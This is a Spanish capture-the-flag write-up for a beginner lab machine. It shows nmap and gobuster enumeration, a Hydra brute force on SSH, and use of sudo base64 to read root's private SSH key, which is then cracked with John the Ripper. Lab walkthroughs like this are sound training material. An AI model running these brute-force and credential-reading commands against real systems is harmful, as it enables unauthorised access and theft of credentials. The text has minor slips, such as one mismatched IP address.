Sal y Azúcar
🔍 Dificultad: Principiante
🔍 RECONOCIMIENTO
En primer lugar, tras conectarnos a la máquina, utilizamos el comando:
ping -c 1 192.168.1.71
para verificar la conectividad de red.

A continuación, se realiza el comando:
nmap -sVC -p- -n --min-rate 5000 192.168.1.71
para realizar un escaneo de puertos y servicios detallado en la dirección IP.

Como podemos observar durante el escaneo que el puerto 22 perteneciente al servicio SSH y el puerto 80 perteneciente al servicio HTTP están abiertos por lo que a continuación se indagará más.
🔎 EXPLORACIÓN
Se utiliza el comando:
sudo nmap -sCV -p22,80 -v 192.168.1.71
para obtener más información sobre ese puerto específicamente.

Seguimos indagando más sobre los puertos y ahora exploramos el servicio HTTP. Ingresamos la IP y nos encontramos la página por defecto de Apache.

Ahora buscaremos directorios con la herramienta Gobuster a través de:
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,htm,php,txt,xml,js -u http://192.168.1.71

Encontramos un directorio summary con el archivo summary.html
.

🚀 EXPLOTACIÓN
Con la información obtenida anteriormente, realizamos el comando:
hydra -t 64 -L /usr/share/wordlists/SecLists/Usernames/xato-net-10-million-usernames.txt -P /usr/share/wordlists/SecLists/Passwords/xato-net-10-million-passwords-1000.txt ssh://192.168.1.71
que utiliza la herramienta Hydra para realizar un ataque de fuerza bruta contra el servicio SSH de una máquina con la IP 192.168.1.60.

Al realizar el ataque de fuerza bruta, hemos descubierto la contraseña de info. Sabiendo esto, nos conectamos a través de SSH al usuario con el comando:
ssh info@192.168.1.71

🔐 PRIVILEGIOS
Al estar dentro y ejecutar:
whoami
aún no somos root, por lo que hacemos:
sudo -l
para ver si hay algo para explotar.

Para ello miramos como escalar privilegios en GTFOBins - base64
sudo base64 "/root/.ssh/id_rsa" | base64 --decode

Como deseamos crackear la clave privada OpenSSH, necesitarás convertirla primero en un formato adecuado que John the Ripper
pueda entender. Para ello, puedes usar la herramienta ssh2john
incluida en John the Ripper
, que convierte la clave en un hash adecuado para que John lo procese.
python /usr/share/john/ssh2john.py hash.txt > hash_for_john.txt
Ahora si realizamos la fuerza bruta.
john --wordlist=/usr/share/wordlists/rockyou.txt hash_for_john.txt

Damos permisos.
chmod 600 hash.txt
Iniciamos sesión.

Ya somos root.

Te deseo mucho éxito en tu búsqueda de las flags! Recuerda prestar atención a cada detalle, examinar los archivos y servicios con detenimiento, y utilizar todas las herramientas disponibles para encontrarlas. La clave para el éxito está en la perseverancia y en no dejar ningún rincón sin explorar. ¡Adelante, hacker! 💻🔍🚀
Last updated
Was this helpful?